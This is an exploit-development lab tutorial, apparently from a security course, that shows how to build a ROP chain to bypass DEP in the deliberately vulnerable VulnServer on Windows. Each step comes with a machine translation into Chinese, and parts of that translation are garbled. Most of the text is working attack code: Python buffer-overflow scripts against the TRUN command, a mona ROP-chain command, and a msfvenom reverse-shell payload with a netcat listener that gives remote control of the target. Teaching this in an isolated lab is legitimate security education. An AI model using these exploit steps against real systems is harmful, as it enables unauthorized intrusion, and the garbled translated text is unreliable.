ED 309: Defeating DEP with ROP (20 pts) ED 309：用ROP击败DEP（20分）

Purpose目的

Use Return Oriented Programming (ROP) to defeat Data Execution Prevention (DEP).使用面向返回编程（ROP）来破坏数据执行保护（DEP）。 Since DEP prevents the code we injected onto the stack from running, we will use tiny pieces of Windows DLL code ("Gadgets") to construct a little program that turns DEP off.由于DEP会阻止我们注入堆栈的代码运行，我们将使用微小的Windows DLL代码（“小工具”）构建一个可以关闭DEP的小程序。

We will use these tools:我们将使用这些工具：

Basic Python scripting基本的Python脚本
Immunity Debugger免疫调试器
MONA plug-in for Immunity MONA插件用于免疫
Metasploit Framework Metasploit框架
nasm_shell.rb nasm_shell.rb

What You Need你需要什么

A Windows machine, real or virtual, to exploit.要利用的Windows机器，无论是真实的还是虚拟的。 I tested Windows 7, 2008 and 2016 and they all work.我测试了Windows 7,2008和2016，它们都有效。 These instructions were written using Windows Server 2016, 64-bit.这些说明是使用64位Windows Server 2016编写的。
A Kali Linux machine, real or virtual, as the attacker. Kali Linux机器，真实的或虚拟的，作为攻击者。
Before doing this project, first do "Proj 9: Exploiting Vulnerable Server on Windows" (without DEP)在执行此项目之前，首先执行“Proj 9：在Windows上利用易受攻击的服务器”（不使用DEP）

WARNING警告

VulnServer is unsafe to run. VulnServer运行起来不安全。 The Windows machine will be vulnerable to compromise. Windows机器很容易受到攻击。 I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your windows machine.我建议在具有NAT网络模式的虚拟机上执行此项目，因此没有外部攻击者可以利用您的Windows机器。

Task 1: Preparing the Windows Machine任务1：准备Windows计算机

Installing and Running "Vulnerable Server"安装并运行“易受攻击的服务器”

You should already have Vulnerable Server downloaded, but if you don't, get it here:您应该已经下载了Vulnerable Server，但如果没有，请在此处获取：

http://sites.google.com/site/lupingreycorner/vulnserver.zip http://sites.google.com/site/lupingreycorner/vulnserver.zip

Or use this alternate download link或使用此备用下载链接

Save the "vulnserver.zip" file on your desktop.将“vulnserver.zip”文件保存在桌面上。

On your desktop, right-click vulnserver.zip .在桌面上，右键单击vulnserver.zip 。

Click " Extract All... ", Extract .单击“ Extract All ... ”， Extract 。

A "vulnserver" window opens. “vulnserver”窗口打开。 Double-click vulnserver .双击vulnserver 。 The Vulnserver application opens, as shown below. Vulnserver应用程序打开，如下所示。

Turning Off Windows Firewall关闭Windows防火墙

On your Windows desktop, click Start .在Windows桌面上，单击“ 开始” 。

In the Search box, type FIREWALL在“搜索”框中，键入FIREWALL

Click " Windows Firewall ".单击“ Windows防火墙 ”。

Turn off the firewall for both private and public networks.关闭私有和公共网络的防火墙。

Finding your Windows Machine's IP Address查找Windows机器的IP地址

On your Windows Machine, open a Command Prompt.在Windows计算机上，打开命令提示符。 Execute the IPCONFIG command.执行IPCONFIG命令。 Find your IP address and make a note of it.找到您的IP地址并记下它。

Testing the Server测试服务器

On your Kali Linux machine, in a Terminal window, execute this command:在Kali Linux计算机上的终端窗口中，执行以下命令：

Replace the IP address with the IP address of your Windows machine.将IP地址替换为Windows计算机的IP地址。

nc 192.168.119.129 9999 nc 192.168.119.129 9999

You should see a banner saying "Welcome to Vulnerable Server!", as shown below.您应该看到一条横幅，上面写着“欢迎使用Vulnerable Server！”，如下所示。

Type EXIT and press Enter to close your connection to Vulnerable Server.键入EXIT并按Enter键以关闭与Vulnerable Server的连接。

Task 2: Launching Vunserver in Immunity任务2：在免疫中启动Vunserver

Install Immunity and Mona安装Immunity和Mona

You should already have Immunity and Mona installed on your Windows machine.您应该已经在Windows计算机上安装了Immunity和Mona。 If you don't, first do the earlier project .如果不这样做，请先执行早期项目。

Close Vulnserver关闭Vulnserver

On your Windows machine, close the vulnserver.exe window.在Windows计算机上，关闭vulnserver.exe窗口。

Launch Vulnserver in Immunity在Immunity中启动Vulnserver

On your Windows machine, launch " Immunity Debugger ".在Windows计算机上，启动“ Immunity Debugger ”。

In Immunity, click File , Open .在“免疫”中，单击“ 文件” ，“ 打开” Navigate to vulnserver.exe and double-click it.导航到vulnserver.exe并双击它。

In the Immunity toolbar, click the magenta Run button.在“免疫”工具栏中，单击洋红色“运行”按钮。 Click the Run button a second time.再次单击“ 运行”按钮。

Task 3: Targeting EIP任务3：针对EIP

The location of the EIP varies in different Windows versions, so let's first verify that it's working on your system. EIP的位置在不同的Windows版本中有所不同，因此我们首先验证它是否适用于您的系统。

Making Nonrepeating Characters制作非重复字符

On your Kali Linux machine, in a Terminal window, execute this command:在Kali Linux计算机上的终端窗口中，执行以下命令：

nano testnr纳米测试

In the nano window, enter this code, as shown below.在nano窗口中，输入此代码，如下所示。

#!/usr/bin/python ＃！的/ usr / bin中/蟒蛇

prefix = 'A' * 1900 prefix ='A'* 1900

test = '' test =''
for a in 'abcdefghij':在'abcdefghij'：
  for b in 'abcdefghij':对于'abcdefghij'中的b：
    test += a + b测试+ = a + b

padding = 'F' * 3000 padding ='F'* 3000
attack = prefix + test + padding attack =前缀+测试+填充
attack = attack[:3000] attack = attack [：3000]

print attack打印攻击

Press Ctrl+X , Y , Enter to save the file.按Ctrl + X ， Y ， Enter保存文件。

Execute these commands to run it:执行以下命令来运行它：

chmod a+x testnr chmod a + x testnr
./testnr ./testnr

You see the attack string: 3000 characters with a string of lowercase characters in the middle, as shown below.您会看到攻击字符串：3000个字符，中间带有一串小写字符，如下所示。

Sending the Attack String to Vulnserver将攻击字符串发送到Vulnserver

On your Kali Linux machine, in a Terminal window, execute this command:在Kali Linux计算机上的终端窗口中，执行以下命令：

nano findeip纳米findeip

In the nano window, enter this code, as shown below.在nano窗口中，输入此代码，如下所示。

#!/usr/bin/python ＃！的/ usr / bin中/蟒蛇
import socket导入套接字
server = '192.168.225.204' server ='192.168.225.204'
sport = 9999 sport = 9999

prefix = 'A' * 1900 prefix ='A'* 1900

test = '' test =''
for a in 'abcdefghij':在'abcdefghij'：
  for b in 'abcdefghij':对于'abcdefghij'中的b：
    test += a + b测试+ = a + b

padding = 'F' * 3000 padding ='F'* 3000
attack = prefix + test + padding attack =前缀+测试+填充
attack = attack[:3000] attack = attack [：3000]

s = socket.socket() s = socket.socket（）
connect = s.connect((server, sport)) connect = s.connect（（server，sport））
print s.recv(1024) print s.recv（1024）
s.send(('TRUN .' + attack + '\r\n')) s.send（（'TRUN。'+ attack +'\ r \ n'））

Press Ctrl+X , Y , Enter to save the file.按Ctrl + X ， Y ， Enter保存文件。

Execute these commands to run it:执行以下命令来运行它：

chmod a+x findeip chmod a + x findeip
./findeip ./findeip

Your Windows machine should show an "Access violation" at the bottom of the Immunity window, as shown below.您的Windows机器应在Immunity窗口的底部显示“访问冲突”，如下所示。

Note these items, outlined in the red in the image below:请注意以下图片中以红色标出的这些项目：

At the bottom, the address that caused the violation appears in hexadecimal在底部，导致违规的地址以十六进制显示
At the top right, the EIP shows the same value在右上角，EIP显示相同的值
In the lower right pane, scroll down one line to see the EIP on the stack.在右下方窗格中，向下滚动一行以查看堆栈上的EIP。 The right side shows the ASCII letters corresponding to these hex values.右侧显示与这些十六进制值对应的ASCII字母。 When I did it, the characters were fdfe .当我这样做时，人物就是fdfe 。

Calculating the EIP Location计算EIP位置

Here's where the fdfe characters appear in the attack string.这是fdfe字符出现在攻击字符串中的位置。 Those characters control the EIP.这些角色控制着EIP。

Before the EIP, we have these characters:在EIP之前，我们有以下这些字符：

1900 "A" characters 1900年 “A”字
20 characters, 10 pairs starting with "a": "aaabacadaeafagahaiaj" 20个字符，10对以“a”开头：“aaabacadaeafagahaiaj”
20 characters, 10 pairs starting with "b" 20个字符，10对以“b”开头
20 characters, 10 pairs starting with "c" 20个字符，10对以“c”开头
20 characters, 10 pairs starting with "d" 20个字符，10对以“d”开头
20 characters, 10 pairs starting with "e" 20个字符，10对以“e”开头
6 characters: "fafbfc" 6个字符：“fafbfc”

For a total of 2006 characters.总共2006个字符。 You may have a different total on your machine.您的计算机上可能有不同的总数。

Restarting Vulnserver in Immunity在Immunity中重新启动Vulnserver

On your Windows machine, in Immunity, click Debug , Restart .在Windows计算机上的Immunity中，单击“ 调试” ，“ 重新启动” 。 Click Yes .单击是。

On the toolbar, click the Run button.在工具栏上，单击“ 运行”按钮。 Click the Run button a second time.再次单击“ 运行”按钮。

Targeting the EIP Precisely准确定位EIP

On your Kali machine, execute this command:在您的Kali机器上，执行以下命令：

nano hiteip纳米hiteip

In the nano window, enter this code, as shown below.在nano窗口中，输入此代码，如下所示。 Adjust the IP address and the "2006" value as needed for your system.根据系统需要调整IP地址和“2006”值。

#!/usr/bin/python ＃！的/ usr / bin中/蟒蛇
import socket导入套接字
server = '192.168.225.204' server ='192.168.225.204'
sport = 9999 sport = 9999

prefix = 'A' * 2006 prefix ='A'* 2006
eip = "BCDE" eip =“BCDE”

padding = 'F' * 3000 padding ='F'* 3000
attack = prefix + eip + padding attack =前缀+ eip + padding
attack = attack[:3000] attack = attack [：3000]

s = socket.socket() s = socket.socket（）
connect = s.connect((server, sport)) connect = s.connect（（server，sport））
print s.recv(1024) print s.recv（1024）
s.send(('TRUN .' + attack + '\r\n')) s.send（（'TRUN。'+ attack +'\ r \ n'））

Press Ctrl+X , Y , Enter to save the file.按Ctrl + X ， Y ， Enter保存文件。

Execute these commands to run it:执行以下命令来运行它：

chmod a+x hiteip chmod a + x hiteip
./hiteip ./hiteip

Your Windows machine should show an "Access violation" at the bottom of the Immunity window, as shown below.您的Windows机器应在Immunity窗口的底部显示“访问冲突”，如下所示。

Note these items, outlined in the red in the image below:请注意以下图片中以红色标出的这些项目：

At the bottom, the address 45444342在底部，地址45444342
At the top right, the EIP shows the same value在右上角，EIP显示相同的值
In the lower right pane, scroll down two lines to see the "A" characters, then the EIP, then the "F" characters.在右下方窗格中，向下滚动两行以查看“A”字符，然后是EIP，然后是“F”字符。

Restarting Vulnserver in Immunity在Immunity中重新启动Vulnserver

On your Windows machine, in Immunity, click Debug , Restart .在Windows计算机上的Immunity中，单击“ 调试” ，“ 重新启动” 。 Click Yes .单击是。

On the toolbar, click the Run button.在工具栏上，单击“ 运行”按钮。 Click the Run button a second time.再次单击“ 运行”按钮。

Task 4: Testing Code Execution on the Stack任务4：测试堆栈上的代码执行

Let's find out whether we can execute code on the stack, which is the classical exploit method from aleph0.让我们看看我们是否可以在堆栈上执行代码，这是aleph0的经典漏洞利用方法。

From the previous project, we know putting 625011af into the EIP will execute JMP ESP and "trampoline" onto the stack.从之前的项目中，我们知道将625011af放入EIP将执行JMP ESP和“trampoline”到堆栈中。

We'll put a NOP sled and a BRK onto the stack, and attempt to execute it.我们将NOP雪橇和BRK放入堆栈，并尝试执行它。

On your Kali machine, execute this command:在您的Kali机器上，执行以下命令：

nano testnx纳米testnx

#!/usr/bin/python ＃！的/ usr / bin中/蟒蛇
import socket导入套接字
server = '192.168.225.204' server ='192.168.225.204'
sport = 9999 sport = 9999

prefix = 'A' * 2006 prefix ='A'* 2006
eip = '\xaf\x11\x50\x62' eip ='\ xaf \ x11 \ x50 \ x62'
nopsled = '\x90' * 16 nopsled ='\ x90'* 16
brk = '\xcc' brk ='\ xcc'

padding = 'F' * 3000 padding ='F'* 3000
attack = prefix + eip + nopsled + brk + padding attack =前缀+ eip + nopsled + brk + padding
attack = attack[:3000] attack = attack [：3000]

s = socket.socket() s = socket.socket（）
connect = s.connect((server, sport)) connect = s.connect（（server，sport））
print s.recv(1024) print s.recv（1024）
s.send(('TRUN .' + attack + '\r\n')) s.send（（'TRUN。'+ attack +'\ r \ n'））

Press Ctrl+X , Y , Enter to save the file.按Ctrl + X ， Y ， Enter保存文件。

Execute these commands to run it:执行以下命令来运行它：

chmod a+x testnx chmod a + x testnx
./testnx ./testnx

Look at your Windows machine.看看你的Windows机器。 If Immunity shows " INT3 command " at the bottom, as shown below, the stack allows code execution.如果Immunity在底部显示“ INT3命令 ”，如下所示，堆栈允许代码执行。

If it shows an "Access violation" when trying to execute a NOP, the stack does not allow code execution.如果在尝试执行NOP时显示“访问冲突”，则堆栈不允许执行代码。

Turning On Data Execution Prevention打开数据执行保护

If your Windows machine allows code execution on the stack, you need to make this adjustment.如果您的Windows机器允许在堆栈上执行代码，则需要进行此调整。

On your Windows machine, click Start .在Windows计算机上，单击“ 开始” 。 Type SYSTEM SETTINGS键入SYSTEM SETTINGS

In the search results, click " View advanced system settings ".在搜索结果中，单击“ 查看高级系统设置 ”。

In the "System Properties" box, on the Advanced tab, in the Performance section, click the Settings... button, as shown below.在“系统属性”框中的“ 高级”选项卡上的“ 性能”部分中，单击“ 设置...”按钮，如下所示。

In the "Performance Options" box, on the " Data Execution Prevention " tab, click the " Turn on DEP for all programs... " button, as shown below.在“性能选项”框中的“ 数据执行保护 ”选项卡上，单击“ 打开所有程序的DEP ... ”按钮，如下所示。

Click OK .单击确定。

Click OK again.再次单击确定。

Click OK a third time.第三次单击“ 确定” 。

Close all programs and restart your Windows machine.关闭所有程序并重新启动Windows计算机。

Testing Code Execution on the Stack Again再次测试堆栈上的代码执行

On your Kali machine, execute these commands:在您的Kali机器上，执行以下命令：

chmod a+x testnx chmod a + x testnx
./testnx ./testnx

Look at your Windows machine.看看你的Windows机器。 It should show an "Access violation" when trying to execute a NOP, as shown below.它在尝试执行NOP时应显示“访问冲突”，如下所示。

Task 5: Using a ROP Chain任务5：使用ROP链

Understanding Return-Oriented Programming (ROP)理解面向回归编程（ROP）

Remember how we located a JMP ESP in the program and used its address for the previous exploit?还记得我们如何在程序中找到JMP ESP并将其地址用于以前的漏洞利用吗？ That was a way to execute code without injecting it--we injected an address into EIP that pointed to the instruction we wanted.这是一种在不注入代码的情况下执行代码的方法 - 我们在EIP中注入了一个指向我们想要的指令的地址。 In Return Oriented Programming (ROP), we find useful little pieces of code with just a few machine language instructions followed by a RETN, and chain them together to perform something useful.在面向返回编程（ROP）中，我们找到了一些有用的小代码，只需要一些机器语言指令，然后是RETN，并将它们链接在一起以执行一些有用的操作。 In principle, we could try to make a whole Metasploit payload like a reverse shell using ROP, but it would be a lot of work.原则上，我们可以尝试使用ROP来制作整个Metasploit有效负载，就像反向shell一样，但这将是很多工作。 In practice, we just use ROP to turn off DEP.在实践中，我们只使用ROP来关闭DEP。 A simple, elegant solution.简单，优雅的解决方案。

To turn off DEP, or to allocate a region of RAM with DEP turned off, we can use any of the following functions: VirtuAlloc(), HeapCreate(), SetProcessDEPPolicy(), NtSetInformationProcess(), VirtualProtect(), or WriteProtectMemory().要关闭DEP，或者在DEP关闭的情况下分配RAM区域，我们可以使用以下任何函数：VirtuAlloc（），HeapCreate（），SetProcessDEPPolicy（），NtSetInformationProcess（），VirtualProtect（）或WriteProtectMemory（）。 It's still a pretty complex process to piece together the "Gadgets" (chunks of machine language code) to accomplish that, but, as usual, the authors of MONA have done the hard work for us :).将“小工具”（机器语言代码块）拼凑起来完成这一过程仍然是一个非常复杂的过程，但是，像往常一样，MONA的作者为我们做了艰苦的工作:)。

Building a ROP Chain with MONA用MONA建立ROP链

You should have MONA installed in Immunity from the previous project.您应该在上一个项目的Immunity中安装MONA。

In Immunity, at the bottom, there is a white bar.在免疫系统中，底部有一个白色条形图。 Click in that bar and type this command, followed by the Enter key:单击该栏并键入此命令，然后按Enter键：

 !mona rop -m * -cpb '\x00'

MONA will now hunt through all the DLLs and construct chains of useful gadgets. MONA现在将搜索所有DLL并构建有用小工具链。

While MONA is running, the bottom left of the Immunity window will show a Searching... message.当MONA正在运行时，Immunity窗口的左下角将显示Searching ...消息。

As you might imagine, this is a big job, so you'll need to wait three minutes or so.正如您可能想象的那样，这是一项很重要的工作，因此您需要等待三分钟左右。 During this time, Immunity may freeze and ignore mouse input.在此期间，Immunity可能会冻结并忽略鼠标输入。

When the process is complete, and the Searching... message vanishes, click View , Log .完成此过程并且“ 搜索...”消息消失后，单击“ 查看” ，“ 日志” 。

You see a message saying " ROP generator finished ", as shown below.您会看到一条消息“ ROP generator finished ”，如下所示。

Scroll up in the Log window a few pages to find the section header, which explains what the ROP gadget does, as shown below.在日志窗口中向上滚动几页以查找节标题，其中说明了ROP小工具的功能，如下所示。

There are several different gadgets here, which work on different versions of Windows.这里有几个不同的小工具，可以在不同版本的Windows上运行。 When I did it, the last gadget on the list was VirtualAlloc(), as shown below.当我这样做时，列表中的最后一个小工具是VirtualAlloc（），如下所示。 This gadget does not work on Windows Server 2016.此小工具在Windows Server 2016上不起作用。

In the Mona log window, right-click and click " Copy to clipboard ", " Whole table ", as shown above.在Mona日志窗口中，右键单击并单击“ 复制到剪贴板 ”，“ 整个表 ”，如上所示。

Find the " Register setup for VirtualProtect() " header, as shown below.找到“ 为VirtualProtect（）注册设置 ”标题，如下所示。

Scroll down to the Python code, highlight it, right-click, and copy it, as shown below.向下滚动到Python代码，突出显示它，右键单击并复制它，如下所示。

Adding the ROP Code to the Attack将ROP代码添加到攻击中

On your Kali Linux machine, in a Terminal window, execute this command:在Kali Linux计算机上的终端窗口中，执行以下命令：

nano ropchain纳米罗缎

In the nano window, press Shift+Ctrl+V to paste in the Python ROP chain code.在nano窗口中，按Shift + Ctrl + V粘贴Python ROP链代码。

The result should be as shown below.结果应如下所示。

Fixing Indentation修复缩进

Indentation matters in Python.缩进在Python中很重要。

Remove the leading spaces from the first and last lines of the code: the lines beginning with def and rop_chain , as shown below.从代码的第一行和最后一行中删除前导空格：以def和rop_chain开头的行，如下所示。

Adding Code at the Top在顶部添加代码

At the top of the file, insert this code, as shown below.在文件的顶部，插入此代码，如下所示。 Adjust the IP address and the "2006" value as needed for your system.根据系统需要调整IP地址和“2006”值。

Note that this is indentical to the code we used previously, except for adding the "struct" and "sys" libraries.请注意，除了添加“struct”和“sys”库之外，这与我们之前使用的代码相同。

#!/usr/bin/python ＃！的/ usr / bin中/蟒蛇
import socket, struct, sys import socket，struct，sys 
server = '192.168.225.205' server ='192.168.225.205'
sport = 9999 sport = 9999

prefix = 'A' * 2006 prefix ='A'* 2006
eip = '\xaf\x11\x50\x62' eip ='\ xaf \ x11 \ x50 \ x62'
nopsled = '\x90' * 16 nopsled ='\ x90'* 16
brk = '\xcc' brk ='\ xcc'

Your window should look like the image shown below.您的窗口应如下图所示。

Adding Code at the Bottom在底部添加代码

At the bottom of the file, insert this code, as shown below.在文件的底部，插入此代码，如下所示。

padding = 'F' * 3000 padding ='F'* 3000
attack = prefix + rop_chain + nopsled + brk + padding attack =前缀+ rop_chain + nopsled + brk + padding
attack = attack[:3000] attack = attack [：3000]

s = socket.socket() s = socket.socket（）
connect = s.connect((server, sport)) connect = s.connect（（server，sport））
print s.recv(1024) print s.recv（1024）
s.send(('TRUN .' + attack + '\r\n')) s.send（（'TRUN。'+ attack +'\ r \ n'））

Save the code with Ctrl+X , Y , Enter .使用Ctrl + X ， Y ， Enter保存代码。

Restarting Vulnserver in Immunity在Immunity中重新启动Vulnserver

On your Windows machine, in Immunity, click Debug , Restart .在Windows计算机上的Immunity中，单击“ 调试” ，“ 重新启动” 。 Click Yes .单击是。

On the toolbar, click the Run button.在工具栏上，单击“ 运行”按钮。 Click the Run button a second time.再次单击“ 运行”按钮。

Running the ROP Chain Exploit运行ROP Chain Exploit

On your Kali machine, execute these commands:在您的Kali机器上，执行以下命令：

chmod a+x ropchain chmod a + x ropchain
./ropchain ./ropchain

Look at your Windows machine.看看你的Windows机器。 The status bar at the bottom left should show "INT3 command", as shown below.左下角的状态栏应显示“INT3命令”，如下所示。

Scrolling back a few lines in the top left window shows that several NOP commands were executed, followed by an INT3, even though these were on a non-executable stack.在左上角窗口中向后滚动几行显示已执行了几个NOP命令，后面跟着INT3，即使这些命令位于不可执行的堆栈上。 The ROP chain changed the permissions to enable stack execution! ROP链更改了权限以启用堆栈执行！

Troubleshooting故障排除
If your exploit fails with an "Access violation", as shown below:如果您的漏洞利用“访问冲突”失败，如下所示：
add this command to your exploit to remove null characters, as shown below:将此命令添加到您的漏洞利用以删除空字符，如下所示：
 rop_chain = rop_chain.replace('\x00', '') 
This correction is needed because some ROP chains produced by Mona contain 16-bit values, but the join() operation in Python treats them as 32-bit values, inserting unwanted null bytes into the string.需要进行此更正是因为Mona生成的一些ROP链包含16位值，但Python中的join（）操作将它们视为32位值，将不需要的空字节插入到字符串中。

Task 6: Adding Shellcode任务6：添加Shellcode

Now that we can execute code on the stack, we need to add exploit code.现在我们可以在堆栈上执行代码，我们需要添加漏洞利用代码。

Creating Exploit Code创建漏洞利用代码

On your Kali Linux machine, in a Terminal window, execute this command.在Kali Linux计算机上的终端窗口中，执行此命令。

ifconfig

Find your Kali machine's IP address and make a note of it.找到您的Kali机器的IP地址并记下它。

On your Kali Linux machine, in a Terminal window, execute the command below.在Kali Linux计算机上的终端窗口中，执行以下命令。

Replace the IP address with the IP address of your Kali Linux machine.将IP地址替换为Kali Linux计算机的IP地址。

msfvenom -p windows/shell_reverse_tcp LHOST="192.168.225.155" LPORT=443 EXITFUNC=thread -b '\x00' -f python

This command makes an exploit that will connect from the Windows target back to the Kali Linux attacker on port 443 and execute commands from Kali.此命令产生一个漏洞，它将从Windows目标连接回端口443上的Kali Linux攻击者并执行来自Kali的命令。

The exploit is encoded to avoid null bytes.对漏洞进行编码以避免空字节。 because '\x00' is a bad character.因为'\ x00'是个坏人物。

Use the mouse to highlight the exploit code, as shown below.使用鼠标突出显示漏洞利用代码，如下所示。 Right-click the highlighted code and click Copy .右键单击突出显示的代码，然后单击“ 复制”

Inserting the Exploit Code into Python将漏洞利用代码插入Python

On your Kali Linux machine, in a Terminal window, execute these commands:在Kali Linux计算机上的终端窗口中，执行以下命令：

cp ropchain ropshell cp ropchain ropshell
nano ropshell nano ropshell

Use the down-arrow key to move the cursor to the end of this line:使用向下箭头键将光标移动到此行的末尾：

sport= 9999 sport = 9999

Press Enter twice to insert blank lines.按两次Enter键以插入空行。

Then right-click and click Paste to insert the shellcode, as shown below.然后右键单击并单击“ 粘贴”以插入shellcode，如下所示。

Now we need to insert the Metasploit payoad, buf, where we had a brk instruction.现在我们需要插入Metasploit payoad，buf，我们有一个brk指令。

Near the bottom of the file, change this line:在文件底部附近，更改此行：

attack = prefix + rop_chain + nopsled + brk + padding attack =前缀+ rop_chain + nopsled + brk + padding

to this:对此：

attack = prefix + rop_chain + nopsled + buf + padding attack =前缀+ rop_chain + nopsled + buf + padding

as shown below.如下所示。

Save the code with Ctrl+X , Y , Enter .使用Ctrl + X ， Y ， Enter保存代码。

Starting a Listener启动监听器

On your Kali Linux machine, open a new Terminal window and execute this command:在Kali Linux计算机上，打开一个新的终端窗口并执行以下命令：

nc -nlvp 443 nc -nlvp 443

This starts a listener on port 443, as shown below.这将在端口443上启动侦听器，如下所示。 Your Kali machine is now a Command & Control server, waiting for the Windows target to phone home to it.您的Kali计算机现在是一个命令和控制服务器，等待Windows目标通过电话回家。

Starting Vulnserver without Immunity在没有免疫力的情况下启动Vulnserver

On your Windows machine, close Immunity.在您的Windows机器上，关闭Immunity。

Navigate to the vulnserver.exe file and double-click it.导航到vulnserver.exe文件并双击它。 The server runs, as shown below.服务器运行，如下所示。

Running the Exploit运行漏洞利用程序

On your Kali Linux machine, open a new a Terminal window and execute this command:在Kali Linux计算机上，打开一个新的终端窗口并执行以下命令：

./ropshell ./ropshell

In Kali Linux, the other Terminal window shows a Windows prompt, as shown below.在Kali Linux中，另一个终端窗口显示Windows提示符，如下所示。 You now control the Windows machine!你现在控制Windows机器！

Executing TASKLIST执行TASKLIST

This doesn't add aything to the exploit.这不会为漏洞利用添加任何东西。 It just gathers some information to submit to record your success.它只是收集一些信息来提交以记录您的成功。

In the Terminal window controlling the Windows machine, execute this command, as shown below.在控制Windows机器的终端窗口中，执行此命令，如下所示。

TASKLIST /FI "IMAGENAME eq vulnserver.exe" /M TASKLIST / FI“IMAGENAME eq vulnserver.exe”/ M.

There are several modules used by this process.该过程使用了几个模块。 Find the one beginning with "n", covered by a green rectangle in the image below.找到以“n”开头的那个，由下图中的绿色矩形覆盖。

ED 309.1: Recording Your Success (20 pts.) ED 309.1：记录您的成功（20分）

The flag is covered by a green rectangle in the image above.上图中的绿色矩形覆盖了该标志。

Sources来源

Vulnserver DEP Bypass Exploit Vulnserver DEP绕过漏洞利用

Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik's[TM] Cube 利用写作教程第10部分：使用ROP链接DEP - Rubik的[TM] Cube

Perl pack function Perl包功能

Bypassing ASLR and DEP on Windows: The Audio Converter Case 在Windows上绕过ASLR和DEP：音频转换器案例

Return-Oriented Programming (ROP) Exploit Example 面向回归编程（ROP）漏洞利用示例

Posted 7-12-14 1:51 pm by Sam Bowne由Sam Bowne发表于7-12-14 1:51 pm
Updated 9-30-15更新9-30-15
Windows 10 path added 4-24-18 Windows 10路径添加4-24-18
Mona troubleshooting tip added 8-26-18 Mona疑难解答提示添加了8-26-18